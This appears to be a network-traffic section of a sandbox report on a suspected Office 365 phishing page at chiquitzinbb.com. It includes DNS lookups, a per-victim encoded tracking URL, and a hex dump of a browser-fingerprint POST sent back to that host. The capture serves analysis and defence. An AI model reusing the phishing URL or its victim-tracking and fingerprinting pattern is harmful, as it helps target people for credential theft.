                                        Oct 24, 2024 03:41:10.394728899 CEST49739443192.168.2.1620.12.23.50
                                        Oct 24, 2024 03:41:10.396014929 CEST49739443192.168.2.1620.12.23.50
                                        Oct 24, 2024 03:41:10.396027088 CEST4434973920.12.23.50192.168.2.16
                                        Oct 24, 2024 03:41:10.396553040 CEST4434973920.12.23.50192.168.2.16
                                        Oct 24, 2024 03:41:10.398286104 CEST49739443192.168.2.1620.12.23.50
                                        Oct 24, 2024 03:41:10.443340063 CEST4434973920.12.23.50192.168.2.16
                                        Oct 24, 2024 03:41:10.680691004 CEST4434973920.12.23.50192.168.2.16
                                        Oct 24, 2024 03:41:10.680757046 CEST4434973920.12.23.50192.168.2.16
                                        Oct 24, 2024 03:41:10.680800915 CEST4434973920.12.23.50192.168.2.16
                                        Oct 24, 2024 03:41:10.680840015 CEST49739443192.168.2.1620.12.23.50
                                        Oct 24, 2024 03:41:10.680864096 CEST4434973920.12.23.50192.168.2.16
                                        Oct 24, 2024 03:41:10.680891991 CEST49739443192.168.2.1620.12.23.50
                                        Oct 24, 2024 03:41:10.680918932 CEST49739443192.168.2.1620.12.23.50
                                        Oct 24, 2024 03:41:10.797997952 CEST4434973920.12.23.50192.168.2.16
                                        Oct 24, 2024 03:41:10.798108101 CEST49739443192.168.2.1620.12.23.50
                                        Oct 24, 2024 03:41:10.798121929 CEST4434973920.12.23.50192.168.2.16
                                        Oct 24, 2024 03:41:10.798190117 CEST49739443192.168.2.1620.12.23.50
                                        Oct 24, 2024 03:41:10.798198938 CEST4434973920.12.23.50192.168.2.16
                                        Oct 24, 2024 03:41:10.798223972 CEST4434973920.12.23.50192.168.2.16
                                        Oct 24, 2024 03:41:10.798249960 CEST49739443192.168.2.1620.12.23.50
                                        Oct 24, 2024 03:41:10.798273087 CEST49739443192.168.2.1620.12.23.50
                                        Oct 24, 2024 03:41:10.798295021 CEST4434973920.12.23.50192.168.2.16
                                        Oct 24, 2024 03:41:10.798305988 CEST49739443192.168.2.1620.12.23.50
                                        Oct 24, 2024 03:41:10.798316956 CEST4434973920.12.23.50192.168.2.16
                                        Oct 24, 2024 03:41:10.798325062 CEST49739443192.168.2.1620.12.23.50
                                        Oct 24, 2024 03:41:10.798329115 CEST4434973920.12.23.50192.168.2.16
                                        Oct 24, 2024 03:41:24.328896046 CEST49741443192.168.2.16142.250.185.68
                                        Oct 24, 2024 03:41:24.328985929 CEST44349741142.250.185.68192.168.2.16
                                        Oct 24, 2024 03:41:24.329279900 CEST49741443192.168.2.16142.250.185.68
                                        Oct 24, 2024 03:41:24.329411030 CEST49741443192.168.2.16142.250.185.68
                                        Oct 24, 2024 03:41:24.329442978 CEST44349741142.250.185.68192.168.2.16
                                        Oct 24, 2024 03:41:25.190599918 CEST44349741142.250.185.68192.168.2.16
                                        Oct 24, 2024 03:41:25.190979958 CEST49741443192.168.2.16142.250.185.68
                                        Oct 24, 2024 03:41:25.191040039 CEST44349741142.250.185.68192.168.2.16
                                        Oct 24, 2024 03:41:25.191528082 CEST44349741142.250.185.68192.168.2.16
                                        Oct 24, 2024 03:41:25.192121983 CEST49741443192.168.2.16142.250.185.68
                                        Oct 24, 2024 03:41:25.192210913 CEST44349741142.250.185.68192.168.2.16
                                        Oct 24, 2024 03:41:25.236768007 CEST49741443192.168.2.16142.250.185.68
                                        Oct 24, 2024 03:41:35.198982954 CEST44349741142.250.185.68192.168.2.16
                                        Oct 24, 2024 03:41:35.199127913 CEST44349741142.250.185.68192.168.2.16
                                        Oct 24, 2024 03:41:35.201632023 CEST49741443192.168.2.16142.250.185.68
                                        Oct 24, 2024 03:41:35.726511955 CEST49741443192.168.2.16142.250.185.68
                                        Oct 24, 2024 03:41:35.726545095 CEST44349741142.250.185.68192.168.2.16
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 24, 2024 03:40:19.556277037 CEST53617981.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:19.631666899 CEST53570021.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:20.366672993 CEST5771953192.168.2.161.1.1.1
                                        Oct 24, 2024 03:40:20.366838932 CEST6323753192.168.2.161.1.1.1
                                        Oct 24, 2024 03:40:20.596831083 CEST53632371.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:20.607307911 CEST53577191.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:20.870467901 CEST53647641.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:22.923908949 CEST5929553192.168.2.161.1.1.1
                                        Oct 24, 2024 03:40:22.924057007 CEST6445953192.168.2.161.1.1.1
                                        Oct 24, 2024 03:40:22.931446075 CEST53644591.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:22.935432911 CEST53592951.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:23.807786942 CEST5652353192.168.2.161.1.1.1
                                        Oct 24, 2024 03:40:23.807985067 CEST4994753192.168.2.161.1.1.1
                                        Oct 24, 2024 03:40:24.038551092 CEST53499471.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:24.067032099 CEST53565231.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:24.266822100 CEST5477553192.168.2.161.1.1.1
                                        Oct 24, 2024 03:40:24.267174959 CEST6098153192.168.2.161.1.1.1
                                        Oct 24, 2024 03:40:24.274180889 CEST53547751.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:24.274211884 CEST53609811.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:24.408068895 CEST5538653192.168.2.161.1.1.1
                                        Oct 24, 2024 03:40:24.408529043 CEST5818553192.168.2.161.1.1.1
                                        Oct 24, 2024 03:40:24.414028883 CEST5135953192.168.2.161.1.1.1
                                        Oct 24, 2024 03:40:24.414140940 CEST6342753192.168.2.161.1.1.1
                                        Oct 24, 2024 03:40:24.415508986 CEST53553861.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:24.418648958 CEST53581851.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:24.421780109 CEST53634271.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:24.421811104 CEST53513591.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:24.453505993 CEST5834053192.168.2.161.1.1.1
                                        Oct 24, 2024 03:40:24.453664064 CEST6074653192.168.2.161.1.1.1
                                        Oct 24, 2024 03:40:24.460676908 CEST53607461.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:24.461594105 CEST53583401.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:24.547025919 CEST53639521.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:25.745455980 CEST5512553192.168.2.161.1.1.1
                                        Oct 24, 2024 03:40:25.745726109 CEST6458353192.168.2.161.1.1.1
                                        Oct 24, 2024 03:40:25.752746105 CEST53551251.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:25.753258944 CEST53645831.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:37.824712992 CEST53597841.1.1.1192.168.2.16
                                        Oct 24, 2024 03:40:56.894545078 CEST53559171.1.1.1192.168.2.16
                                        Oct 24, 2024 03:41:19.452476978 CEST53567091.1.1.1192.168.2.16
                                        Oct 24, 2024 03:41:19.769922972 CEST53634851.1.1.1192.168.2.16
                                        Oct 24, 2024 03:41:22.386140108 CEST138138192.168.2.16192.168.2.255
                                        Oct 24, 2024 03:41:24.906924963 CEST53524631.1.1.1192.168.2.16
                                        Oct 24, 2024 03:41:48.142141104 CEST53534631.1.1.1192.168.2.16
                                        TimestampSource IPDest IPChecksumCodeType
                                        Oct 24, 2024 03:40:25.400481939 CEST192.168.2.161.1.1.1c2ea(Port unreachable)Destination Unreachable
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Oct 24, 2024 03:40:20.366672993 CEST192.168.2.161.1.1.10xe0e8Standard query (0)chiquitzinbb.comA (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:20.366838932 CEST192.168.2.161.1.1.10xd35fStandard query (0)chiquitzinbb.com65IN (0x0001)false
                                        Oct 24, 2024 03:40:22.923908949 CEST192.168.2.161.1.1.10xc763Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:22.924057007 CEST192.168.2.161.1.1.10x5b4Standard query (0)cdn.socket.io65IN (0x0001)false
                                        Oct 24, 2024 03:40:23.807786942 CEST192.168.2.161.1.1.10x42adStandard query (0)chiquitzinbb.comA (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:23.807985067 CEST192.168.2.161.1.1.10x7b8cStandard query (0)chiquitzinbb.com65IN (0x0001)false
                                        Oct 24, 2024 03:40:24.266822100 CEST192.168.2.161.1.1.10xa4aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.267174959 CEST192.168.2.161.1.1.10x7bf7Standard query (0)www.google.com65IN (0x0001)false
                                        Oct 24, 2024 03:40:24.408068895 CEST192.168.2.161.1.1.10xc020Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.408529043 CEST192.168.2.161.1.1.10x5909Standard query (0)cdn.socket.io65IN (0x0001)false
                                        Oct 24, 2024 03:40:24.414028883 CEST192.168.2.161.1.1.10xb1caStandard query (0)www.w3schools.comA (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.414140940 CEST192.168.2.161.1.1.10xe87cStandard query (0)www.w3schools.com65IN (0x0001)false
                                        Oct 24, 2024 03:40:24.453505993 CEST192.168.2.161.1.1.10xc611Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.453664064 CEST192.168.2.161.1.1.10x988eStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                        Oct 24, 2024 03:40:25.745455980 CEST192.168.2.161.1.1.10xa0d7Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:25.745726109 CEST192.168.2.161.1.1.10x1bf7Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Oct 24, 2024 03:40:20.607307911 CEST1.1.1.1192.168.2.160xe0e8No error (0)chiquitzinbb.com157.230.134.73A (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:22.931446075 CEST1.1.1.1192.168.2.160x5b4No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                        Oct 24, 2024 03:40:22.935432911 CEST1.1.1.1192.168.2.160xc763No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                        Oct 24, 2024 03:40:22.935432911 CEST1.1.1.1192.168.2.160xc763No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:22.935432911 CEST1.1.1.1192.168.2.160xc763No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:22.935432911 CEST1.1.1.1192.168.2.160xc763No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:22.935432911 CEST1.1.1.1192.168.2.160xc763No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.067032099 CEST1.1.1.1192.168.2.160x42adNo error (0)chiquitzinbb.com157.230.134.73A (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.274180889 CEST1.1.1.1192.168.2.160xa4aNo error (0)www.google.com142.250.185.68A (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.274211884 CEST1.1.1.1192.168.2.160x7bf7No error (0)www.google.com65IN (0x0001)false
                                        Oct 24, 2024 03:40:24.415508986 CEST1.1.1.1192.168.2.160xc020No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.415508986 CEST1.1.1.1192.168.2.160xc020No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.415508986 CEST1.1.1.1192.168.2.160xc020No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.415508986 CEST1.1.1.1192.168.2.160xc020No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.415508986 CEST1.1.1.1192.168.2.160xc020No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.418648958 CEST1.1.1.1192.168.2.160x5909No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.421780109 CEST1.1.1.1192.168.2.160xe87cNo error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.421811104 CEST1.1.1.1192.168.2.160xb1caNo error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.421811104 CEST1.1.1.1192.168.2.160xb1caNo error (0)cs837.wac.edgecastcdn.net192.229.133.221A (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.458169937 CEST1.1.1.1192.168.2.160xc834No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.458169937 CEST1.1.1.1192.168.2.160xc834No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.460676908 CEST1.1.1.1192.168.2.160x988eNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.460676908 CEST1.1.1.1192.168.2.160x988eNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.461594105 CEST1.1.1.1192.168.2.160xc611No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.461594105 CEST1.1.1.1192.168.2.160xc611No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.461594105 CEST1.1.1.1192.168.2.160xc611No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.481751919 CEST1.1.1.1192.168.2.160x9969No error (0)shed.dual-low.s-part-0039.t-0009.t-msedge.nets-part-0039.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                        Oct 24, 2024 03:40:24.481751919 CEST1.1.1.1192.168.2.160x9969No error (0)s-part-0039.t-0009.t-msedge.net13.107.246.67A (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:25.351996899 CEST1.1.1.1192.168.2.160xf1a7No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                        Oct 24, 2024 03:40:25.351996899 CEST1.1.1.1192.168.2.160xf1a7No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:25.382891893 CEST1.1.1.1192.168.2.160xd018No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                        Oct 24, 2024 03:40:25.382891893 CEST1.1.1.1192.168.2.160xd018No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:25.752746105 CEST1.1.1.1192.168.2.160xa0d7No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                        Oct 24, 2024 03:40:25.752746105 CEST1.1.1.1192.168.2.160xa0d7No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                        Oct 24, 2024 03:40:25.752746105 CEST1.1.1.1192.168.2.160xa0d7No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                        Oct 24, 2024 03:40:25.753258944 CEST1.1.1.1192.168.2.160x1bf7No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                        Oct 24, 2024 03:40:25.753258944 CEST1.1.1.1192.168.2.160x1bf7No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                        • chiquitzinbb.com
                                        • https:
                                          • cdn.socket.io
                                          • aadcdn.msauth.net
                                          • logincdn.msauth.net
                                          • www.w3schools.com
                                          • aadcdn.msftauth.net
                                        • fs.microsoft.com
                                        • slscr.update.microsoft.com
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.1649704157.230.134.734436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:21 UTC740OUTGET /o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N HTTP/1.1
                                        Host: chiquitzinbb.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-10-24 01:40:21 UTC336INHTTP/1.1 200 OK
                                        Date: Thu, 24 Oct 2024 01:40:21 GMT
                                        Server: Apache
                                        X-Powered-By: PHP/7.2.34
                                        Cache-Control: no-store
                                        Set-Cookie: _cid=113903e38d58c1cba4bae1499e6181af; expires=Thu, 24-Oct-2024 01:41:21 GMT; Max-Age=60
                                        X-Powered-By: PleskLin
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        2024-10-24 01:40:21 UTC6INData Raw: 31 32 36 39 0d 0a
                                        Data Ascii: 1269
                                        2024-10-24 01:40:21 UTC4713INData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 59 6f 75 20 6e 65 65 64 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 74 6f 20 72 75 6e 20 74 68 69 73 20 61 70 70 2e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 0a 20
                                        Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <noscript>You need to enable JavaScript to run this app.</noscript> <div id="root">
                                        2024-10-24 01:40:21 UTC2INData Raw: 0d 0a
                                        Data Ascii:
                                        2024-10-24 01:40:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.1649703157.230.134.734436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:22 UTC1025OUTPOST /o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N HTTP/1.1
                                        Host: chiquitzinbb.com
                                        Connection: keep-alive
                                        Content-Length: 139064
                                        Cache-Control: max-age=0
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        Origin: https://chiquitzinbb.com
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-Dest: document
                                        Referer: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: _cid=113903e38d58c1cba4bae1499e6181af
                                        2024-10-24 01:40:22 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                        Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                        2024-10-24 01:40:22 UTC16384OUTData Raw: 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f
                                        Data Ascii: %22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultController%22%3A%22function+WritableStreamDefaultCo
                                        2024-10-24 01:40:22 UTC16384OUTData Raw: 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 70 6f 6e 73 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 70 6f 6e 73 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 45 6e 74
                                        Data Ascii: 2%3A%22function+SVGAElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22Response%22%3A%22function+Response%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverSize%22%3A%22function+ResizeObserverSize%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverEnt
                                        2024-10-24 01:40:22 UTC16384OUTData Raw: 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 6e 75 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25
                                        Data Ascii: %22%3A%22function+HTMLMenuElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMediaElement%22%3A%22function+HTMLMediaElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMarqueeElement%22%3A%22function+HTMLMarqueeElement%28%29+%7B+%5Bnative+code%5D+%7D%22%
                                        2024-10-24 01:40:22 UTC16384OUTData Raw: 6f 72 74 53 69 67 6e 61 6c 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6f 66 66 73 63 72 65 65 6e 42 75 66 66 65 72 69 6e 67 25 32 32 25 33 41 74 72 75 65 25 32 43 25 32 32 57 65 62 41 73 73 65 6d 62 6c 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 57 65 62 41 73 73 65 6d 62 6c 79 25 35 44 25 32 32 25 32 43 25 32 32 41 62 73 6f 6c 75 74 65 4f 72 69 65 6e 74 61 74 69 6f 6e 53 65 6e 73 6f 72 25 32 32 25
